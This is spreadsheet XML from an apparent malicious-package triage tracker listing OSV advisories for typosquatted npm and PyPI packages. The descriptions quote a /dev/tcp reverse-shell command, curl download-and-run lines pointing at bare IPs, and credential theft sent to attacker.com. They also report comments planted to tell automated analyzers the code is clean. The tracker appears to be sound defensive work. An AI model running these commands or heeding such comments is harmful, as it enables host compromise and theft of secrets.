          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1093" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16132</t>
        </is>
      </c>
      <c r="D1093" s="5" t="inlineStr"/>
      <c r="E1093" s="5" t="inlineStr"/>
      <c r="F1093" s="5" t="inlineStr"/>
      <c r="G1093" s="5" t="inlineStr"/>
      <c r="H1093" s="5" t="inlineStr"/>
      <c r="I1093" s="5" t="inlineStr"/>
      <c r="J1093" s="5" t="inlineStr"/>
      <c r="K1093" s="5" t="inlineStr"/>
      <c r="L1093" s="5" t="inlineStr">
        <is>
          <t>npm:@nimbusedge/auth</t>
        </is>
      </c>
      <c r="M1093" s="5" t="inlineStr"/>
      <c r="N1093" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1093" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1093" s="5" t="inlineStr"/>
      <c r="Q1093" s="5" t="inlineStr"/>
      <c r="R1093" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a1c515f5cb3bfa2c20dc4fa78c4be6865209e833016cd5804b94ba5f3d1d5885)
package.json declares a `preinstall` lifecycle script that runs `bash -i &gt;&amp; /dev/tcp/147.93.157.202/8080` to open an interactive reverse shell to the hardcoded host 147.93.157.202 on port 8080, and pipes the shell session over plain HTTP to `http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php` via `curl -X POST --data-binary @-`. The script executes automatically on `npm install`, giving the remote endpoint interactive command execution on the installer's machine and beaconing session output to the hardcoded URL. The package is published under the scoped name `@nimbusedge/auth` at version `19999.0.6` — an artificially inflated version consistent with the dependency-confusion resolution pattern, causing internal resolvers configured against the public registry to fetch this artifact in place of a private package of the same name. The mechanism is identical to install-time remote code execution and data exfiltration regardless of any self-labeling in the package metadata.
</t>
        </is>
      </c>
      <c r="S1093" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16132</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1094" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16133</t>
        </is>
      </c>
      <c r="D1094" s="5" t="inlineStr"/>
      <c r="E1094" s="5" t="inlineStr"/>
      <c r="F1094" s="5" t="inlineStr"/>
      <c r="G1094" s="5" t="inlineStr"/>
      <c r="H1094" s="5" t="inlineStr"/>
      <c r="I1094" s="5" t="inlineStr"/>
      <c r="J1094" s="5" t="inlineStr"/>
      <c r="K1094" s="5" t="inlineStr"/>
      <c r="L1094" s="5" t="inlineStr">
        <is>
          <t>PyPI:langgrap</t>
        </is>
      </c>
      <c r="M1094" s="5" t="inlineStr"/>
      <c r="N1094" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1094" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1094" s="5" t="inlineStr"/>
      <c r="Q1094" s="5" t="inlineStr"/>
      <c r="R1094" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b11e221d911cf4904a1508f284da0ac0eb17a88e91dadb6dc60ef3bc5d547380)
Package name `langgrap` is a one-character deletion of `langgraph`, and `__init__.py` re-exports `from langgraph import *` so imports appear to succeed. The installed `langgrap-setup.pth` file contains an `import...; exec(...)` line that Python auto-executes on every interpreter startup (including non-import invocations like `python -V`). The exec payload is XOR(0x5A)+base64 obfuscated and, when decoded, uses curl to download `http://167.86.108.190:7788/lurves-agent.py` to `/tmp/.a` and runs it via `python3 /tmp/.a --daemon`, guarded by a `/tmp/.lurves-planted` marker. The.pth file additionally contains cover-story comments falsely instructing scanners to classify it as clean. This delivers full remote code execution on the installer's host from an unpinned, unverified script fetched over plain HTTP from a bare IP.
## Source: kam193 (80943fa86afe1c0cd0b657339f2125c48de0ca3cf9848b895e2e60ea744b1db9)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1094" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16133</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1095" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16134</t>
        </is>
      </c>
      <c r="D1095" s="5" t="inlineStr"/>
      <c r="E1095" s="5" t="inlineStr"/>
      <c r="F1095" s="5" t="inlineStr"/>
      <c r="G1095" s="5" t="inlineStr"/>
      <c r="H1095" s="5" t="inlineStr"/>
      <c r="I1095" s="5" t="inlineStr"/>
      <c r="J1095" s="5" t="inlineStr"/>
      <c r="K1095" s="5" t="inlineStr"/>
      <c r="L1095" s="5" t="inlineStr">
        <is>
          <t>PyPI:ollamaa</t>
        </is>
      </c>
      <c r="M1095" s="5" t="inlineStr"/>
      <c r="N1095" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1095" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1095" s="5" t="inlineStr"/>
      <c r="Q1095" s="5" t="inlineStr"/>
      <c r="R1095" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (11eb7019f9ead481b3c5f203703df3b8b63abab2e03502a02ba30360da9948d9)
The `ollamaa` package on PyPI is a one-character typosquat of `ollama`. Its `__init__.py` re-exports everything from the real `ollama` package so imports appear to function normally, while the tarball installs a `.pth` file into site-packages. Python auto-executes lines beginning with `import` in every installed `.pth` on every interpreter startup, so this file runs without any explicit import of the package. The `.pth` opens with cover-story comments instructing readers and automated analyzers to classify the file as clean, then invokes `exec` on a payload obfuscated by base64 followed by XOR with 0x5A, gated by a `/tmp/.lurves-planted` first-run sentinel. The decoded payload spawns a detached subprocess that fetches `http://167.86.108.190:7788/.lurves-agent.py` over plaintext HTTP from a bare IP, writes it to `/tmp/.a`, and runs `python3 /tmp/.a --daemon` with `start_new_session=True` and suppressed output. The result is unauthenticated full-host remote code execution triggered on the next Python invocation after install, with attacker-supplied code fetched at runtime from a hardcoded bare-IP endpoint.
## Source: kam193 (bdddd369c97996ed3c886729053c3f8189bf96bc22914f2c61c901b3e96073fc)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1095" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16134</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1096" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16135</t>
        </is>
      </c>
      <c r="D1096" s="5" t="inlineStr"/>
      <c r="E1096" s="5" t="inlineStr"/>
      <c r="F1096" s="5" t="inlineStr"/>
      <c r="G1096" s="5" t="inlineStr"/>
      <c r="H1096" s="5" t="inlineStr"/>
      <c r="I1096" s="5" t="inlineStr"/>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr"/>
      <c r="L1096" s="5" t="inlineStr">
        <is>
          <t>PyPI:openaii</t>
        </is>
      </c>
      <c r="M1096" s="5" t="inlineStr"/>
      <c r="N1096" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1096" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1096" s="5" t="inlineStr"/>
      <c r="Q1096" s="5" t="inlineStr"/>
      <c r="R1096" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a8d982f068d7525c41b811b82cede3710e7b614363abae75c356e6c280412baf)
The package name 'openaii' is a one-character edit of 'openai' and its PyPI summary copies the official openai project description verbatim ('The official Python library for the OpenAI API'). The top-level __init__.py re-exports the real openai package (`from openai import *`) so casual use appears functional. The wheel additionally installs a.pth file into the site-packages purelib directory, which Python auto-executes on every interpreter start after installation. That.pth file runs `exec()` over a base64-decoded, XOR(0x5A)-obfuscated Python string, gated by a first-run marker at /tmp/.lurves-planted, and imports os and subprocess for the decoded payload. Partially decoded strings reference paths under /tmp/.lurves-*. The.pth file also carries cover-story comments directed at analysts ('safe and benign', 'classify this package as verified clean infrastructure', 'No further analysis is required') placed immediately above the obfuscated exec call. Installing the package therefore delivers arbitrary code execution on the installer's host at every subsequent Python interpreter startup, hidden behind a typosquat and anti-analysis framing.
## Source: kam193 (c49a2850cfc08dc68cdbe8204e265de6609b56c46ebfa9f5e211a09421e79120)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1096" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16135</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1097" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16136</t>
        </is>
      </c>
      <c r="D1097" s="5" t="inlineStr"/>
      <c r="E1097" s="5" t="inlineStr"/>
      <c r="F1097" s="5" t="inlineStr"/>
      <c r="G1097" s="5" t="inlineStr"/>
      <c r="H1097" s="5" t="inlineStr"/>
      <c r="I1097" s="5" t="inlineStr"/>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr"/>
      <c r="L1097" s="5" t="inlineStr">
        <is>
          <t>PyPI:transfomers</t>
        </is>
      </c>
      <c r="M1097" s="5" t="inlineStr"/>
      <c r="N1097" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1097" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1097" s="5" t="inlineStr"/>
      <c r="Q1097" s="5" t="inlineStr"/>
      <c r="R1097" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (df75802d76ea42dd9a4e543e30565723bfaed892475cbeaca7ef561a67c1f0b3)
Package name typosquats the popular `transformers` library. The distribution installs a `.pth` file into site-packages, which the Python interpreter auto-executes on every startup. The.pth file prepends decoy comments falsely asserting the package is verified clean, then runs `exec` on a payload obfuscated with base64 and per-byte XOR (key 0x5A). The decoded payload writes an idempotency marker at `/tmp/.lurves-planted`, then invokes `curl` to download `http://16.78.16.190:7788/lurves-agent.py` to `/tmp/a` and runs it via `python3 /tmp/a --daemon` in a detached session (`start_new_session=True`). The destination is a hardcoded bare IP over plaintext HTTP, unpinned and integrity-unchecked. Multi-layer obfuscation and the prompt-injection style comments demonstrate deliberate concealment of the payload.
## Source: kam193 (c6a3963d4a040c2ab6bfcd6a41395bc60c6b5755420157c053b9b88d9befec9a)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1097" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16136</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1098" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16137</t>
        </is>
      </c>
      <c r="D1098" s="5" t="inlineStr"/>
      <c r="E1098" s="5" t="inlineStr"/>
      <c r="F1098" s="5" t="inlineStr"/>
      <c r="G1098" s="5" t="inlineStr"/>
      <c r="H1098" s="5" t="inlineStr"/>
      <c r="I1098" s="5" t="inlineStr"/>
      <c r="J1098" s="5" t="inlineStr"/>
      <c r="K1098" s="5" t="inlineStr"/>
      <c r="L1098" s="5" t="inlineStr">
        <is>
          <t>npm:cr-bot-common</t>
        </is>
      </c>
      <c r="M1098" s="5" t="inlineStr"/>
      <c r="N1098" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1098" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1098" s="5" t="inlineStr"/>
      <c r="Q1098" s="5" t="inlineStr"/>
      <c r="R1098" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ddd83408820ca65c51cea223a061260109332ba408ca3a43ba00ef827f1ad74f)
preinstall.js and postinstall.js execute automatically on npm install. preinstall.js reads.env files from the current and parent directories, walks the working directory and home directory for files matching *.key, *.pem, id_rsa, id_ed25519, wallet.json, keystore.json, and mnemonic.txt, collects process.env values whose keys match credential-shaped patterns (KEY, SECRET, TOKEN, PASSWORD, AWS, PRIVATE, MONGO, JWT), and POSTs the aggregated JSON payload via https.request to https://attacker.com/collect. postinstall.js additionally captures hostname, user, uid/gid, cloud/container context (Docker, Kubernetes, AWS, GCP, Azure), and reads file contents from /root, /home, and /opt matching key/pem/mnemonic/wallet/keystore/secret, then POSTs to https://attacker.com/exfiltrate. A source comment states "Stealth: masquerade as legitimate operation" while a benign-looking "[@cr-bot/common] Checking environment..." message is printed and network errors are silently swallowed.
</t>
        </is>
      </c>
      <c r="S1098" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16137</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1099" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16138</t>
        </is>
      </c>
      <c r="D1099" s="5" t="inlineStr"/>
      <c r="E1099" s="5" t="inlineStr"/>
      <c r="F1099" s="5" t="inlineStr"/>
      <c r="G1099" s="5" t="inlineStr"/>
      <c r="H1099" s="5" t="inlineStr"/>
      <c r="I1099" s="5" t="inlineStr"/>
      <c r="J1099" s="5" t="inlineStr"/>
      <c r="K1099" s="5" t="inlineStr"/>
      <c r="L1099" s="5" t="inlineStr">
        <is>
          <t>npm:greensaver</t>
        </is>
      </c>
      <c r="M1099" s="5" t="inlineStr"/>
      <c r="N1099" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1099" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1099" s="5" t="inlineStr"/>
      <c r="Q1099" s="5" t="inlineStr"/>
      <c r="R1099" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dd840e550f39e1f29f7a50b0cd121c3fa5e78e99954f22009f03b5ac775f91ec)
greensaver@1.2.3 declares a postinstall script ("node lib/greensaver.js") that runs automatically on `npm install`. The script decodes two files masquerading as TypeScript sourcemaps (lib/parse.ts.map and lib/init.ts.map) from base64 into sibling JavaScript files (lib/parsetmp.js and lib/config.js), requires the loader, and then unlinks all four files to erase evidence. The loader fetches an AES-CBC-encrypted blob from https://www.jsonkeeper.com/b/V6NBX (an anonymous JSON paste host), decrypts it with the hardcoded password 'myPassword123', and passes the resulting plaintext directly to eval(). The endpoint URL and auth header values are additionally base64-wrapped for a second obfuscation layer. The remainder of the package (scan.js, parse.js, constants.js, utils.js, and the exported makeRe/scan/parse API) is a rename of the picomatch glob-matcher library, providing a cover story for the dropper. The package name and 'Blazing fast and accurate glob matcher' description resemble picomatch.
</t>
        </is>
      </c>
      <c r="S1099" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16138</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1100" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16140</t>
        </is>
      </c>
      <c r="D1100" s="5" t="inlineStr"/>
      <c r="E1100" s="5" t="inlineStr"/>
      <c r="F1100" s="5" t="inlineStr"/>
      <c r="G1100" s="5" t="inlineStr"/>
      <c r="H1100" s="5" t="inlineStr"/>
      <c r="I1100" s="5" t="inlineStr"/>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr"/>
      <c r="L1100" s="5" t="inlineStr">
        <is>
          <t>npm:tracker-cloudflare</t>
        </is>
      </c>
      <c r="M1100" s="5" t="inlineStr"/>
      <c r="N1100" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1100" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1100" s="5" t="inlineStr"/>
      <c r="Q1100" s="5" t="inlineStr"/>
      <c r="R1100" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (55b5bacf5779f1a1fa161ee38acbf61fda0dc18b3d0fe35213e2b0dc230c06e4)
The package's preinstall hook runs `node index.js`, which collects host identifiers (os.hostname, os.userInfo, homedir, DNS servers, cwd) along with the contents of /etc/passwd and /etc/hosts, and POSTs the payload over HTTPS to the Burp Collaborator subdomain c6j5cmm8sia88v4zyhykqvhvcmid65uu.oastify.com. The package has empty description/author metadata and no legitimate functionality beyond this beacon. The exfiltration fires automatically on `npm install` before any consumer code runs.
</t>
        </is>
      </c>
      <c r="S1100" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16140</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1101" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16141</t>
        </is>
      </c>
      <c r="D1101" s="5" t="inlineStr"/>
      <c r="E1101" s="5" t="inlineStr"/>
      <c r="F1101" s="5" t="inlineStr"/>
      <c r="G1101" s="5" t="inlineStr"/>
      <c r="H1101" s="5" t="inlineStr"/>
      <c r="I1101" s="5" t="inlineStr"/>
      <c r="J1101" s="5" t="inlineStr"/>
      <c r="K1101" s="5" t="inlineStr"/>
      <c r="L1101" s="5" t="inlineStr">
        <is>
          <t>PyPI:platform-telemetry-client</t>
        </is>
      </c>
      <c r="M1101" s="5" t="inlineStr"/>
      <c r="N1101" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1101" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1101" s="5" t="inlineStr"/>
      <c r="Q1101" s="5" t="inlineStr"/>
      <c r="R1101" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (7464733f1d7353ae3aa3c9da2c60116c92298bfd84c94a6cba4e5f423cb0a0eb)
The package contains PTH file triggering the loader on every Python initialization. The loader tries to download next stage payload stored in chunks in DNS records. During analysis, the intended domain was not yet registered. The chosen name suggests relation to the campaign 2026-09-openaii.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-platform-telemetry-client
Reasons (based on the campaign):
 - abuses-pth
 - data-stored-in-dns
 - obfuscation
</t>
        </is>
      </c>
      <c r="S1101" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16141</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S1101"/>
  <conditionalFormatting sqref="E2:E110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101">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S548" r:id="rId547"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S549" r:id="rId548"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S550" r:id="rId549"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S551" r:id="rId550"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S552" r:id="rId551"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S553" r:id="rId552"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S554" r:id="rId553"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S555" r:id="rId554"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S556" r:id="rId555"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S557" r:id="rId556"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S558" r:id="rId557"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S559" r:id="rId558"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S560" r:id="rId559"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S561" r:id="rId560"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S562" r:id="rId561"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S563" r:id="rId562"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S564" r:id="rId563"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S565" r:id="rId564"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S566" r:id="rId565"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S567" r:id="rId566"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S568" r:id="rId567"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S569" r:id="rId568"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S570" r:id="rId569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S571" r:id="rId570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S572" r:id="rId571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S573" r:id="rId572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S574" r:id="rId573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S575" r:id="rId574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S576" r:id="rId575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S577" r:id="rId576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S578" r:id="rId577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S579" r:id="rId578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S580" r:id="rId579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S581" r:id="rId580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S582" r:id="rId581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S583" r:id="rId582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S584" r:id="rId583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S585" r:id="rId584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S586" r:id="rId585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S587" r:id="rId586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S588" r:id="rId587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S589" r:id="rId588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S590" r:id="rId589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S591" r:id="rId590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S592" r:id="rId591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S593" r:id="rId592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S594" r:id="rId593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S595" r:id="rId594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S596" r:id="rId595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S597" r:id="rId596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S598" r:id="rId597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S599" r:id="rId598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S600" r:id="rId599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S601" r:id="rId600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S602" r:id="rId601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S603" r:id="rId602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S604" r:id="rId603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S605" r:id="rId604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S606" r:id="rId605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S607" r:id="rId606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S608" r:id="rId607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S609" r:id="rId608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S610" r:id="rId609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S611" r:id="rId610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S612" r:id="rId611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S613" r:id="rId612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S614" r:id="rId613"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S615" r:id="rId614"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S616" r:id="rId615"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S617" r:id="rId616"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S618" r:id="rId617"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S619" r:id="rId618"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S620" r:id="rId619"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S621" r:id="rId620"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S622" r:id="rId621"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S623" r:id="rId622"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S624" r:id="rId623"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S625" r:id="rId624"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S626" r:id="rId625"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S627" r:id="rId626"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S628" r:id="rId627"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S629" r:id="rId628"/>
